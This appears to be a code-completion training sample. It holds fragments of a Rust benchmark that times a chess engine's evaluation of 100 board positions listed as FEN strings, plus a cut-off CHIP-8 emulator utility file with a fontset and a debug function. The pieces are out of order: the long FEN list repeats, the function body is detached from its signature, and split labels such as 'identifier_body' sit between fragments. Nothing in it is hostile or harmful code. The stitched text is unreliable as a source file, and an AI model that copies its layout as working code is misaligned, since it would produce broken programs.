"4k2r/2Pb1ppp/4p3/3p4/1P1P1B2/r3P1PB/1R1K1P1P/ w - - 1 25",
"4kb2/p1p1pp1r/6p1/8/PP1qn3/1p3Q2/6PP/R4R1K w - - 0 24",
"4r1k1/p4p1p/2p3p1/1p6/1P2B3/P3BP2/1P2KP1P/5R b - - 1 25",
"5b1r/1N2nppp/5k2/2q5/p3Q3/P1P5/1P3PPP/R4RK b - - 4 22",
"8/ppQ5/k7/5p2/7P/P3P1P1/3NP3/R3KB b Q - 3 36",
"3k1b2/4p1p1/2B5/5p2/Pr6/2N5/R1P2PPP/4K2R b K - 4 26",
"r2qkb2/1ppbpp2/p6r/3p4/6P1/1PP1P1QP/P2N1P2/RN2KB1R b KQq - 4 20",
"4kb1B/4pp2/7p/8/1p6/2N1q3/2K1N1PP/7R w - - 0 26",
"8/4p1bk/2P1Q3/5P1p/1q2P3/8/2P1K2P/6r w - - 3 36",
"r2qk2r/Q2ppp1p/1p4p1/2P5/8/P2BPN2/1RP3PP/1N2K2R w Kk - 1 22",
"5q1r/p1p1k2p/2p1bb1Q/3pp3/P1P5/1r6/3N2PP/5RK w - - 2 25",
"3qkr2/2p2pb1/2p1ppN1/3p4/3P2P1/4r2P/2pK1P2/1R1Q1R b - - 1 21",
"3k4/2pqpp2/6p1/pp2n3/8/8/Pb2QPB1/5K b - - 3 31",
"3r4/1p3kbp/1p2p1p1/5q2/2Pp4/PP2PP2/4Q1PP/R3K2R w KQ - 0 20",
"r5kr/pp2b1p1/2p5/2P4p/5B2/P5P1/1P2qPB1/1RR3K w - - 1 21",
"1B2kb1r/p2p2p1/b1q1p3/5n1p/P1p1N3/2P2PP1/7P/R2QK1NR b k - 0 20",
"3r1k1r/Q4ppp/3b4/8/6N1/PP1P2P1/K2N1P1P/4R2R w - - 3 28",
"3rkb1r/p2nnp2/6pp/8/7P/PPP1P3/2qB1P2/R3K1R w Qk - 2 22",
"r2qk2r/p1pb1ppp/p4n2/4p3/3bP3/Pn1P3P/1P3PP1/2B2KNR w kq - 1 14",
"2kr4/1pp5/2b1p1pr/p2pPpRp/P4P1P/1PP1P3/3K4/2RQ b - - 0 31",
"r7/pp1n3p/2b2p2/2b4Q/5PP1/6kP/PB2P2R/R3KB b Q - 2 22",
"R7/p2kn2R/2p1p3/2b5/1P2p3/8/1PP2P2/1K1N1B b - - 0 34",
"r2qkr1b/2pppp2/1pQ3p1/p5Bp/8/2P2N2/PP2PPPP/1N1RKB1R b Kq - 0 14",
"r3k1n1/pp6/2p5/q2pb2r/4p1K1/1P2P1B1/P4PPP/1Q3R b q - 3 22",
"8/k7/ppp5/2b1n1p1/8/2P3PP/2B1K3/2R w - - 0 44",
"1r1kr3/p2p2pp/4Bn2/5P2/NP6/8/5PPP/3RK2R b K - 0 22",
"3r2kr/5p1p/8/3Pn1PB/2p5/7q/7P/3RK1R b - - 1 35",
"r3kb1Q/1p1bppp1/8/4q3/p3N3/n4PP1/P1p1B1KP/3R w q - 0 29",
"r3kr2/pppn1pQ1/8/4p3/3pNq2/1P1B4/P2R1PPP/4KR b q - 1 24",
"8/8/5k2/5p2/P7/3P1PP1/3QPP2/4KB w - - 6 39",
"6nr/pQbk4/2N1ppB1/1N5p/3P4/P7/1P1P1PPP/R1B1K2R b KQ - 4 21",
"r3kr2/p3pp2/1qbp2p1/1p5p/1P3B2/P1P2PP1/1N5P/R2Q1K b q - 0 24",
"2r5/3k1p2/2p2P1p/p2r4/3P4/P1p4P/4R3/3BK w - - 1 39",
"5r2/b4kp1/p1p4p/1p3P2/1P2R3/2N1PK1P/5P2/2N w - - 1 28",
"2n1qk2/p4pb1/6p1/1p2P3/5P2/4P1P1/PPP2K1R/R4Q b - - 0 22",
"r2qkb2/p5pQ/5p1p/4p3/4p3/P3PN2/1P1B2PP/3NKB1R w Kq - 0 27",
"3k4/3rn3/1p6/p6p/1r2PP2/2R3P1/PP5P/1K2Q1R b - - 1 31",
"3qkb2/2p1pp2/p4n1p/3P4/5r2/4NP2/P3PKPP/2R2B1R w - - 5 22",
"r1b1k2r/p3b2p/8/1P6/2p1NP2/4Pp2/PP3P1P/2R1KBR w kq - 0 25",
"5k2/5p2/p2p3p/8/2pP4/5N2/7P/1K w - - 0 43",
"r7/p1p5/2k2p2/3p2rp/4PNP1/P1P2P2/7P/3R2K b - - 0 33",
"7r/6kp/2n2p2/p4r2/1P2NP2/P5KP/5RP1/3R w - - 2 45",
"8/7p/5pk1/6p1/8/3R4/p1K5/6r w - - 0 43",
"4k2r/R4p2/4p2p/2Pq2p1/3P1bP1/7P/5BB1/6KR b - - 2 34",
"5r2/prk5/2pn3p/5pp1/6R1/1P4P1/PKP4P/7R w - f6 0 35",
"5k2/1pp2p2/6p1/p4n2/5R2/2N2P2/6PP/4K b - - 2 34",
"r3r3/2Q2pp1/p6k/3p4/2p1pP1P/4P1P1/2RKB3/1q w - - 0 41",
"r6k/pp5p/6p1/2p2b2/2n5/8/7P/K w - - 0 39",
"5r2/1b1rkp2/3pp3/2p3R1/p3P3/5PP1/q3BKP1/4Q1N b - - 1 38",
"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"];
|
bench_100_evaluations
|
identifier_name
|
eval_benches.rs
|
use std::time::Duration;
use criterion::{Criterion,black_box};
use pleco::tools::eval::Eval;
use pleco::{Board};
fn bench_100_evaluations(c: &mut Criterion)
|
criterion_group!(name = eval_benches;
config = Criterion::default().sample_size(20).warm_up_time(Duration::from_millis(5));
targets = bench_100_evaluations
);
static RAND_BOARD_NON_CHECKS_100: [&str; 100] = [
"3qkb1r/3ppp2/3r1np1/2Q4p/5P2/1P3B2/P1P1PP1P/R2NK2R b k - 0 22",
"r3kb1r/1p1bpp2/1p3n1p/q2p2p1/8/PQ6/1P1NPPPP/R3KBNR w KQkq - 2 14",
"r2qkbnr/pp2p1pp/2p1b3/3pNpB1/3P4/8/PP1NPPPP/R2QKB1R w KQkq - 2 8",
"r1bqk2r/pppp3p/5b2/1P6/5p2/P5P1/1QP1P2P/RN2KB1R b KQkq - 2 16",
"3rr3/2pkb3/2p1p3/p1Pn1p2/P1QP1P2/1P1KPP1p/7P/1R w - - 12 39",
"3k3r/1r5p/6p1/1B6/1P2K3/P7/5RPP/ b - - 0 28",
"r1bqkbnr/ppppppp1/n7/3P2p1/Q4P2/2P5/PP2P1PP/RN2KBNR b KQkq - 2 6",
"3rk2r/pppb3p/2n1p3/1B6/3bP3/P4P2/3N2PP/4K2R b Kk - 0 22",
"rn2kb1r/1ppqpbpp/5n2/p3Q3/8/PP1P4/1BPP1PPP/R2NKB1R b KQkq - 3 13",
"r2qkbnr/ppp1Bppp/2n5/3p1b2/3P4/2N5/PPP1PPPP/R2QKBNR b KQkq - 0 4",
"r3k1nr/pp1n1pbp/1qp1p1p1/6B1/P2PP1P1/1Pp2N2/2P2P2/R2QKB1R b KQkq - 0 13",
"2r1r3/3k4/1qpn1p2/8/RP1pP3/3R1PPp/1p5P/1N4K w - - 2 39",
"r1bqkb1r/ppp1pppp/2n5/3p2B1/P2Pn3/1P6/2P1PPPP/RN1QKBNR w KQkq - 2 5",
"r2nk2r/1p2bppp/p3p3/8/P4nB1/1P1P2N1/2QN1PbP/R1B1K1R b Qkq - 7 21",
"2r1k2r/pp1n2p1/5p1p/2P5/4PP2/8/PPb3PP/4KBNR b Kk - 0 19",
"rkb4r/pp1pnppp/2npp3/8/P5P1/1P1N1N1P/3PPP2/2RQKB1R w K - 4 20",
"7r/3b3p/Q2b1k2/2pq2p1/5p2/2P5/PP1NBPPP/3R1KR w - - 4 22",
"r2qk1nr/1pp2pBp/8/3p4/pb1P2b1/2N5/PPP1PPPP/R2QKB1R b KQkq - 0 9",
"8/5k1p/2p3p1/1p1p4/p4b2/5B1P/8/5K b - - 4 38",
"2kr4/2pnr3/3p4/1p1P1B2/P3P2P/2K4P/2R5/R w - - 0 42",
"8/pp5p/3r1bp1/1Pp1kbP1/P1B1p2P/4P3/2P2P2/3NKR w - - 5 25",
"5rk1/3rbp1p/4p3/1N5p/5P2/1PNP2P1/1BK4P/4R b - - 3 35",
"r1bq1b1r/p2pkppp/2p2n2/1n2N3/4p3/PPP1P3/3P1PPP/R1BQKB1R b KQ - 0 10",
"3qkb1r/p3pppp/1r3n2/2pBn3/8/2N2PP1/PPPP1P1P/1RBQKR w k - 9 12",
"1n1bk2r/2p3pp/p3bp2/4p3/K7/P1q2NPP/4PPB1/3R b k - 1 29",
"r2qk2r/pppb1pp1/2n1p2p/8/1B1Pn2P/5NP1/PPP2P2/R2QKB1R b KQkq - 0 11",
"r2qkr2/ppp1n3/6b1/7p/2P4Q/1P6/P3PPPP/R3KB1R w KQq - 3 19",
"2N2knr/1p3ppp/2qPp3/8/p7/2PQ4/1P1P1PPP/R1B1KBNR b KQ - 0 17",
"r1bqkbnr/pppppppp/8/6B1/1n6/8/PPP1PPPP/RN1QKBNR w KQkq - 2 5",
"r2k1b1r/pp2ppp1/2p2n1p/3p1b2/1P1P4/q1N1PN2/2nBKPPP/2RQ1B1R w - - 0 12",
"r4rk1/np2bppp/p3p3/2p5/2PP1q2/P3R3/1P2PPBP/R1BQK w Q - 1 17",
"r3kb2/pppqpppr/5n1p/3p4/3P4/2N5/PPPBPPPP/R2QKB1R w KQq - 0 9",
"r1bqkbnr/pppppppp/2n5/6B1/3P4/8/PPP1PPPP/RN1QKBNR b KQkq - 2 2",
"r2qkr2/1bpppp2/p7/1p4pp/1P1Q4/PP2BP1P/1N2P1P1/1N2KnR w q - 0 18",
"r1bqkr2/ppppn1pp/5p2/4p3/3P3B/1PQ2N2/P1P1PPPP/R3KB1R w KQq - 1 12",
"r1b1kb1r/ppqp1p2/2n1p3/1B4pn/4P3/2P5/PP1N1PPP/R2QK2R b KQkq - 1 11",
"r3kbnr/pppqpppp/6b1/1N2P3/3p2P1/8/PPPP1P1P/R1BQKB1R b KQkq - 0 8",
"2Q5/4k1b1/6p1/5p1p/pP1P1P2/2P5/5RPP/5RK w - - 5 45",
"r3k1nr/p1p1pp2/2N3qp/8/5pb1/bP6/3NPPPP/1R1QKB1R w Kkq - 1 16",
"r3k1r1/4np1p/4p3/4n3/6P1/P4N1P/2NPPP2/4KB1R w K - 0 21",
"5R2/2k5/pppr4/P3Q3/P2P2P1/2P2N2/3NP1P1/R3KB w Q - 0 33",
"4k2r/pp2pppp/7n/3b4/8/2P4P/P3KP2/1R b - - 1 20",
"4kr2/6R1/1pn4p/p1p1p3/2P5/P4P2/1P2BP1P/4K w - - 2 25",
"3rkb1r/p2nnp1p/5qp1/4p3/8/1P1PN1P1/PB1PPPBP/R2QK1R w Qk - 0 16",
"r7/pbkp1Np1/4rp1p/1Q2P3/8/P7/2P1P1PP/4KB1R b K - 0 20",
"r1b1k2r/1p1pbp2/7p/p7/2p1P3/P5B1/1q1N1PP1/R2QKB1R w KQkq - 1 18",
"3qkb1r/p1pnpp2/7p/6p1/3P4/PrP1PQ2/3B1PPP/R4RK w k - 0 17",
"r3kb1r/p2ppp1p/5np1/8/1p2b3/1N2Q3/Pq3PPP/3RKBNR b Kkq - 1 14",
"r7/pk6/2b1p3/5p2/P6P/4P2N/2P3r1/2K3n w - - 0 36",
"r3kb1r/p3pppp/2p2n2/Rp6/3P1B2/1PP2b2/1P2PPPP/3QKB1R w Kkq - 0 14",
"4k2r/2Pb1ppp/4p3/3p4/1P1P1B2/r3P1PB/1R1K1P1P/ w - - 1 25",
"4kb2/p1p1pp1r/6p1/8/PP1qn3/1p3Q2/6PP/R4R1K w - - 0 24",
"4r1k1/p4p1p/2p3p1/1p6/1P2B3/P3BP2/1P2KP1P/5R b - - 1 25",
"5b1r/1N2nppp/5k2/2q5/p3Q3/P1P5/1P3PPP/R4RK b - - 4 22",
"8/ppQ5/k7/5p2/7P/P3P1P1/3NP3/R3KB b Q - 3 36",
"3k1b2/4p1p1/2B5/5p2/Pr6/2N5/R1P2PPP/4K2R b K - 4 26",
"r2qkb2/1ppbpp2/p6r/3p4/6P1/1PP1P1QP/P2N1P2/RN2KB1R b KQq - 4 20",
"4kb1B/4pp2/7p/8/1p6/2N1q3/2K1N1PP/7R w - - 0 26",
"8/4p1bk/2P1Q3/5P1p/1q2P3/8/2P1K2P/6r w - - 3 36",
"r2qk2r/Q2ppp1p/1p4p1/2P5/8/P2BPN2/1RP3PP/1N2K2R w Kk - 1 22",
"5q1r/p1p1k2p/2p1bb1Q/3pp3/P1P5/1r6/3N2PP/5RK w - - 2 25",
"3qkr2/2p2pb1/2p1ppN1/3p4/3P2P1/4r2P/2pK1P2/1R1Q1R b - - 1 21",
"3k4/2pqpp2/6p1/pp2n3/8/8/Pb2QPB1/5K b - - 3 31",
"3r4/1p3kbp/1p2p1p1/5q2/2Pp4/PP2PP2/4Q1PP/R3K2R w KQ - 0 20",
"r5kr/pp2b1p1/2p5/2P4p/5B2/P5P1/1P2qPB1/1RR3K w - - 1 21",
"1B2kb1r/p2p2p1/b1q1p3/5n1p/P1p1N3/2P2PP1/7P/R2QK1NR b k - 0 20",
"3r1k1r/Q4ppp/3b4/8/6N1/PP1P2P1/K2N1P1P/4R2R w - - 3 28",
"3rkb1r/p2nnp2/6pp/8/7P/PPP1P3/2qB1P2/R3K1R w Qk - 2 22",
"r2qk2r/p1pb1ppp/p4n2/4p3/3bP3/Pn1P3P/1P3PP1/2B2KNR w kq - 1 14",
"2kr4/1pp5/2b1p1pr/p2pPpRp/P4P1P/1PP1P3/3K4/2RQ b - - 0 31",
"r7/pp1n3p/2b2p2/2b4Q/5PP1/6kP/PB2P2R/R3KB b Q - 2 22",
"R7/p2kn2R/2p1p3/2b5/1P2p3/8/1PP2P2/1K1N1B b - - 0 34",
"r2qkr1b/2pppp2/1pQ3p1/p5Bp/8/2P2N2/PP2PPPP/1N1RKB1R b Kq - 0 14",
"r3k1n1/pp6/2p5/q2pb2r/4p1K1/1P2P1B1/P4PPP/1Q3R b q - 3 22",
"8/k7/ppp5/2b1n1p1/8/2P3PP/2B1K3/2R w - - 0 44",
"1r1kr3/p2p2pp/4Bn2/5P2/NP6/8/5PPP/3RK2R b K - 0 22",
"3r2kr/5p1p/8/3Pn1PB/2p5/7q/7P/3RK1R b - - 1 35",
"r3kb1Q/1p1bppp1/8/4q3/p3N3/n4PP1/P1p1B1KP/3R w q - 0 29",
"r3kr2/pppn1pQ1/8/4p3/3pNq2/1P1B4/P2R1PPP/4KR b q - 1 24",
"8/8/5k2/5p2/P7/3P1PP1/3QPP2/4KB w - - 6 39",
"6nr/pQbk4/2N1ppB1/1N5p/3P4/P7/1P1P1PPP/R1B1K2R b KQ - 4 21",
"r3kr2/p3pp2/1qbp2p1/1p5p/1P3B2/P1P2PP1/1N5P/R2Q1K b q - 0 24",
"2r5/3k1p2/2p2P1p/p2r4/3P4/P1p4P/4R3/3BK w - - 1 39",
"5r2/b4kp1/p1p4p/1p3P2/1P2R3/2N1PK1P/5P2/2N w - - 1 28",
"2n1qk2/p4pb1/6p1/1p2P3/5P2/4P1P1/PPP2K1R/R4Q b - - 0 22",
"r2qkb2/p5pQ/5p1p/4p3/4p3/P3PN2/1P1B2PP/3NKB1R w Kq - 0 27",
"3k4/3rn3/1p6/p6p/1r2PP2/2R3P1/PP5P/1K2Q1R b - - 1 31",
"3qkb2/2p1pp2/p4n1p/3P4/5r2/4NP2/P3PKPP/2R2B1R w - - 5 22",
"r1b1k2r/p3b2p/8/1P6/2p1NP2/4Pp2/PP3P1P/2R1KBR w kq - 0 25",
"5k2/5p2/p2p3p/8/2pP4/5N2/7P/1K w - - 0 43",
"r7/p1p5/2k2p2/3p2rp/4PNP1/P1P2P2/7P/3R2K b - - 0 33",
"7r/6kp/2n2p2/p4r2/1P2NP2/P5KP/5RP1/3R w - - 2 45",
"8/7p/5pk1/6p1/8/3R4/p1K5/6r w - - 0 43",
"4k2r/R4p2/4p2p/2Pq2p1/3P1bP1/7P/5BB1/6KR b - - 2 34",
"5r2/prk5/2pn3p/5pp1/6R1/1P4P1/PKP4P/7R w - f6 0 35",
"5k2/1pp2p2/6p1/p4n2/5R2/2N2P2/6PP/4K b - - 2 34",
"r3r3/2Q2pp1/p6k/3p4/2p1pP1P/4P1P1/2RKB3/1q w - - 0 41",
"r6k/pp5p/6p1/2p2b2/2n5/8/7P/K w - - 0 39",
"5r2/1b1rkp2/3pp3/2p3R1/p3P3/5PP1/q3BKP1/4Q1N b - - 1 38",
"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"];
|
{
c.bench_function("bench_100_evaluations", |b| {
let rand_boards: Vec<Board> = RAND_BOARD_NON_CHECKS_100.iter()
.map(|b| Board::from_fen(b).unwrap())
.collect();
b.iter(|| {
black_box({
for board in rand_boards.iter() {
black_box(Eval::eval_low(board));
}
})
})
});
}
|
identifier_body
|
eval_benches.rs
|
use std::time::Duration;
use criterion::{Criterion,black_box};
use pleco::tools::eval::Eval;
use pleco::{Board};
fn bench_100_evaluations(c: &mut Criterion) {
c.bench_function("bench_100_evaluations", |b| {
let rand_boards: Vec<Board> = RAND_BOARD_NON_CHECKS_100.iter()
.map(|b| Board::from_fen(b).unwrap())
.collect();
b.iter(|| {
black_box({
for board in rand_boards.iter() {
black_box(Eval::eval_low(board));
}
})
})
});
}
criterion_group!(name = eval_benches;
config = Criterion::default().sample_size(20).warm_up_time(Duration::from_millis(5));
targets = bench_100_evaluations
);
static RAND_BOARD_NON_CHECKS_100: [&str; 100] = [
"3qkb1r/3ppp2/3r1np1/2Q4p/5P2/1P3B2/P1P1PP1P/R2NK2R b k - 0 22",
"r3kb1r/1p1bpp2/1p3n1p/q2p2p1/8/PQ6/1P1NPPPP/R3KBNR w KQkq - 2 14",
"r2qkbnr/pp2p1pp/2p1b3/3pNpB1/3P4/8/PP1NPPPP/R2QKB1R w KQkq - 2 8",
"r1bqk2r/pppp3p/5b2/1P6/5p2/P5P1/1QP1P2P/RN2KB1R b KQkq - 2 16",
"3rr3/2pkb3/2p1p3/p1Pn1p2/P1QP1P2/1P1KPP1p/7P/1R w - - 12 39",
"3k3r/1r5p/6p1/1B6/1P2K3/P7/5RPP/ b - - 0 28",
"r1bqkbnr/ppppppp1/n7/3P2p1/Q4P2/2P5/PP2P1PP/RN2KBNR b KQkq - 2 6",
"3rk2r/pppb3p/2n1p3/1B6/3bP3/P4P2/3N2PP/4K2R b Kk - 0 22",
"rn2kb1r/1ppqpbpp/5n2/p3Q3/8/PP1P4/1BPP1PPP/R2NKB1R b KQkq - 3 13",
"r2qkbnr/ppp1Bppp/2n5/3p1b2/3P4/2N5/PPP1PPPP/R2QKBNR b KQkq - 0 4",
"r3k1nr/pp1n1pbp/1qp1p1p1/6B1/P2PP1P1/1Pp2N2/2P2P2/R2QKB1R b KQkq - 0 13",
"2r1r3/3k4/1qpn1p2/8/RP1pP3/3R1PPp/1p5P/1N4K w - - 2 39",
"r1bqkb1r/ppp1pppp/2n5/3p2B1/P2Pn3/1P6/2P1PPPP/RN1QKBNR w KQkq - 2 5",
"r2nk2r/1p2bppp/p3p3/8/P4nB1/1P1P2N1/2QN1PbP/R1B1K1R b Qkq - 7 21",
"2r1k2r/pp1n2p1/5p1p/2P5/4PP2/8/PPb3PP/4KBNR b Kk - 0 19",
"rkb4r/pp1pnppp/2npp3/8/P5P1/1P1N1N1P/3PPP2/2RQKB1R w K - 4 20",
"7r/3b3p/Q2b1k2/2pq2p1/5p2/2P5/PP1NBPPP/3R1KR w - - 4 22",
"r2qk1nr/1pp2pBp/8/3p4/pb1P2b1/2N5/PPP1PPPP/R2QKB1R b KQkq - 0 9",
"8/5k1p/2p3p1/1p1p4/p4b2/5B1P/8/5K b - - 4 38",
"2kr4/2pnr3/3p4/1p1P1B2/P3P2P/2K4P/2R5/R w - - 0 42",
"8/pp5p/3r1bp1/1Pp1kbP1/P1B1p2P/4P3/2P2P2/3NKR w - - 5 25",
"5rk1/3rbp1p/4p3/1N5p/5P2/1PNP2P1/1BK4P/4R b - - 3 35",
"r1bq1b1r/p2pkppp/2p2n2/1n2N3/4p3/PPP1P3/3P1PPP/R1BQKB1R b KQ - 0 10",
"3qkb1r/p3pppp/1r3n2/2pBn3/8/2N2PP1/PPPP1P1P/1RBQKR w k - 9 12",
"1n1bk2r/2p3pp/p3bp2/4p3/K7/P1q2NPP/4PPB1/3R b k - 1 29",
"r2qk2r/pppb1pp1/2n1p2p/8/1B1Pn2P/5NP1/PPP2P2/R2QKB1R b KQkq - 0 11",
"r2qkr2/ppp1n3/6b1/7p/2P4Q/1P6/P3PPPP/R3KB1R w KQq - 3 19",
"2N2knr/1p3ppp/2qPp3/8/p7/2PQ4/1P1P1PPP/R1B1KBNR b KQ - 0 17",
"r1bqkbnr/pppppppp/8/6B1/1n6/8/PPP1PPPP/RN1QKBNR w KQkq - 2 5",
"r2k1b1r/pp2ppp1/2p2n1p/3p1b2/1P1P4/q1N1PN2/2nBKPPP/2RQ1B1R w - - 0 12",
"r4rk1/np2bppp/p3p3/2p5/2PP1q2/P3R3/1P2PPBP/R1BQK w Q - 1 17",
"r3kb2/pppqpppr/5n1p/3p4/3P4/2N5/PPPBPPPP/R2QKB1R w KQq - 0 9",
"r1bqkbnr/pppppppp/2n5/6B1/3P4/8/PPP1PPPP/RN1QKBNR b KQkq - 2 2",
"r2qkr2/1bpppp2/p7/1p4pp/1P1Q4/PP2BP1P/1N2P1P1/1N2KnR w q - 0 18",
"r1bqkr2/ppppn1pp/5p2/4p3/3P3B/1PQ2N2/P1P1PPPP/R3KB1R w KQq - 1 12",
"r1b1kb1r/ppqp1p2/2n1p3/1B4pn/4P3/2P5/PP1N1PPP/R2QK2R b KQkq - 1 11",
"r3kbnr/pppqpppp/6b1/1N2P3/3p2P1/8/PPPP1P1P/R1BQKB1R b KQkq - 0 8",
"2Q5/4k1b1/6p1/5p1p/pP1P1P2/2P5/5RPP/5RK w - - 5 45",
"r3k1nr/p1p1pp2/2N3qp/8/5pb1/bP6/3NPPPP/1R1QKB1R w Kkq - 1 16",
"r3k1r1/4np1p/4p3/4n3/6P1/P4N1P/2NPPP2/4KB1R w K - 0 21",
"5R2/2k5/pppr4/P3Q3/P2P2P1/2P2N2/3NP1P1/R3KB w Q - 0 33",
"4k2r/pp2pppp/7n/3b4/8/2P4P/P3KP2/1R b - - 1 20",
"4kr2/6R1/1pn4p/p1p1p3/2P5/P4P2/1P2BP1P/4K w - - 2 25",
"3rkb1r/p2nnp1p/5qp1/4p3/8/1P1PN1P1/PB1PPPBP/R2QK1R w Qk - 0 16",
"r7/pbkp1Np1/4rp1p/1Q2P3/8/P7/2P1P1PP/4KB1R b K - 0 20",
"r1b1k2r/1p1pbp2/7p/p7/2p1P3/P5B1/1q1N1PP1/R2QKB1R w KQkq - 1 18",
"3qkb1r/p1pnpp2/7p/6p1/3P4/PrP1PQ2/3B1PPP/R4RK w k - 0 17",
"r3kb1r/p2ppp1p/5np1/8/1p2b3/1N2Q3/Pq3PPP/3RKBNR b Kkq - 1 14",
"r7/pk6/2b1p3/5p2/P6P/4P2N/2P3r1/2K3n w - - 0 36",
"r3kb1r/p3pppp/2p2n2/Rp6/3P1B2/1PP2b2/1P2PPPP/3QKB1R w Kkq - 0 14",
"4k2r/2Pb1ppp/4p3/3p4/1P1P1B2/r3P1PB/1R1K1P1P/ w - - 1 25",
"4kb2/p1p1pp1r/6p1/8/PP1qn3/1p3Q2/6PP/R4R1K w - - 0 24",
"4r1k1/p4p1p/2p3p1/1p6/1P2B3/P3BP2/1P2KP1P/5R b - - 1 25",
"5b1r/1N2nppp/5k2/2q5/p3Q3/P1P5/1P3PPP/R4RK b - - 4 22",
"8/ppQ5/k7/5p2/7P/P3P1P1/3NP3/R3KB b Q - 3 36",
"3k1b2/4p1p1/2B5/5p2/Pr6/2N5/R1P2PPP/4K2R b K - 4 26",
"r2qkb2/1ppbpp2/p6r/3p4/6P1/1PP1P1QP/P2N1P2/RN2KB1R b KQq - 4 20",
"4kb1B/4pp2/7p/8/1p6/2N1q3/2K1N1PP/7R w - - 0 26",
"8/4p1bk/2P1Q3/5P1p/1q2P3/8/2P1K2P/6r w - - 3 36",
"r2qk2r/Q2ppp1p/1p4p1/2P5/8/P2BPN2/1RP3PP/1N2K2R w Kk - 1 22",
"5q1r/p1p1k2p/2p1bb1Q/3pp3/P1P5/1r6/3N2PP/5RK w - - 2 25",
"3qkr2/2p2pb1/2p1ppN1/3p4/3P2P1/4r2P/2pK1P2/1R1Q1R b - - 1 21",
"3k4/2pqpp2/6p1/pp2n3/8/8/Pb2QPB1/5K b - - 3 31",
"3r4/1p3kbp/1p2p1p1/5q2/2Pp4/PP2PP2/4Q1PP/R3K2R w KQ - 0 20",
"r5kr/pp2b1p1/2p5/2P4p/5B2/P5P1/1P2qPB1/1RR3K w - - 1 21",
"1B2kb1r/p2p2p1/b1q1p3/5n1p/P1p1N3/2P2PP1/7P/R2QK1NR b k - 0 20",
"3r1k1r/Q4ppp/3b4/8/6N1/PP1P2P1/K2N1P1P/4R2R w - - 3 28",
"3rkb1r/p2nnp2/6pp/8/7P/PPP1P3/2qB1P2/R3K1R w Qk - 2 22",
"r2qk2r/p1pb1ppp/p4n2/4p3/3bP3/Pn1P3P/1P3PP1/2B2KNR w kq - 1 14",
"2kr4/1pp5/2b1p1pr/p2pPpRp/P4P1P/1PP1P3/3K4/2RQ b - - 0 31",
"r7/pp1n3p/2b2p2/2b4Q/5PP1/6kP/PB2P2R/R3KB b Q - 2 22",
"R7/p2kn2R/2p1p3/2b5/1P2p3/8/1PP2P2/1K1N1B b - - 0 34",
"r2qkr1b/2pppp2/1pQ3p1/p5Bp/8/2P2N2/PP2PPPP/1N1RKB1R b Kq - 0 14",
"r3k1n1/pp6/2p5/q2pb2r/4p1K1/1P2P1B1/P4PPP/1Q3R b q - 3 22",
"8/k7/ppp5/2b1n1p1/8/2P3PP/2B1K3/2R w - - 0 44",
"1r1kr3/p2p2pp/4Bn2/5P2/NP6/8/5PPP/3RK2R b K - 0 22",
"3r2kr/5p1p/8/3Pn1PB/2p5/7q/7P/3RK1R b - - 1 35",
"r3kb1Q/1p1bppp1/8/4q3/p3N3/n4PP1/P1p1B1KP/3R w q - 0 29",
"r3kr2/pppn1pQ1/8/4p3/3pNq2/1P1B4/P2R1PPP/4KR b q - 1 24",
"8/8/5k2/5p2/P7/3P1PP1/3QPP2/4KB w - - 6 39",
|
"r3kr2/p3pp2/1qbp2p1/1p5p/1P3B2/P1P2PP1/1N5P/R2Q1K b q - 0 24",
"2r5/3k1p2/2p2P1p/p2r4/3P4/P1p4P/4R3/3BK w - - 1 39",
"5r2/b4kp1/p1p4p/1p3P2/1P2R3/2N1PK1P/5P2/2N w - - 1 28",
"2n1qk2/p4pb1/6p1/1p2P3/5P2/4P1P1/PPP2K1R/R4Q b - - 0 22",
"r2qkb2/p5pQ/5p1p/4p3/4p3/P3PN2/1P1B2PP/3NKB1R w Kq - 0 27",
"3k4/3rn3/1p6/p6p/1r2PP2/2R3P1/PP5P/1K2Q1R b - - 1 31",
"3qkb2/2p1pp2/p4n1p/3P4/5r2/4NP2/P3PKPP/2R2B1R w - - 5 22",
"r1b1k2r/p3b2p/8/1P6/2p1NP2/4Pp2/PP3P1P/2R1KBR w kq - 0 25",
"5k2/5p2/p2p3p/8/2pP4/5N2/7P/1K w - - 0 43",
"r7/p1p5/2k2p2/3p2rp/4PNP1/P1P2P2/7P/3R2K b - - 0 33",
"7r/6kp/2n2p2/p4r2/1P2NP2/P5KP/5RP1/3R w - - 2 45",
"8/7p/5pk1/6p1/8/3R4/p1K5/6r w - - 0 43",
"4k2r/R4p2/4p2p/2Pq2p1/3P1bP1/7P/5BB1/6KR b - - 2 34",
"5r2/prk5/2pn3p/5pp1/6R1/1P4P1/PKP4P/7R w - f6 0 35",
"5k2/1pp2p2/6p1/p4n2/5R2/2N2P2/6PP/4K b - - 2 34",
"r3r3/2Q2pp1/p6k/3p4/2p1pP1P/4P1P1/2RKB3/1q w - - 0 41",
"r6k/pp5p/6p1/2p2b2/2n5/8/7P/K w - - 0 39",
"5r2/1b1rkp2/3pp3/2p3R1/p3P3/5PP1/q3BKP1/4Q1N b - - 1 38",
"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"];
|
"6nr/pQbk4/2N1ppB1/1N5p/3P4/P7/1P1P1PPP/R1B1K2R b KQ - 4 21",
|
random_line_split
|
util.rs
|
use cpu::Cpu;
use opcode::Opcode;
pub static mut DEBUG_MODE: bool = true;
pub static FONTSET: [u8; 80] = [
0xF0, 0x90, 0x90, 0x90, 0xF0, // 0
0x20, 0x60, 0x20, 0x20, 0x70, // 1
0xF0, 0x10, 0xF0, 0x80, 0xF0, // 2
0xF0, 0x10, 0xF0, 0x10, 0xF0, // 3
0x90, 0x90, 0xF0, 0x10, 0x10, // 4
0xF0, 0x80, 0xF0, 0x10, 0xF0, // 5
0xF0, 0x80, 0xF0, 0x90, 0xF0, // 6
0xF0, 0x10, 0x20, 0x40, 0x40, // 7
0xF0, 0x90, 0xF0, 0x90, 0xF0, // 8
0xF0, 0x90, 0xF0, 0x10, 0xF0, // 9
0xF0, 0x90, 0xF0, 0x90, 0x90, // A
0xE0, 0x90, 0xE0, 0x90, 0xE0, // B
0xF0, 0x80, 0x80, 0x80, 0xF0, // C
0xE0, 0x90, 0x90, 0x90, 0xE0, // D
0xF0, 0x80, 0xF0, 0x80, 0xF0, // E
0xF0, 0x80, 0xF0, 0x80, 0x80 // F
];
pub fn
|
(cpu: &Cpu, opcode: &Opcode) {
unsafe {
if!DEBUG_MODE {
return;
}
}
println!("cpu:");
for i in 0..16 {
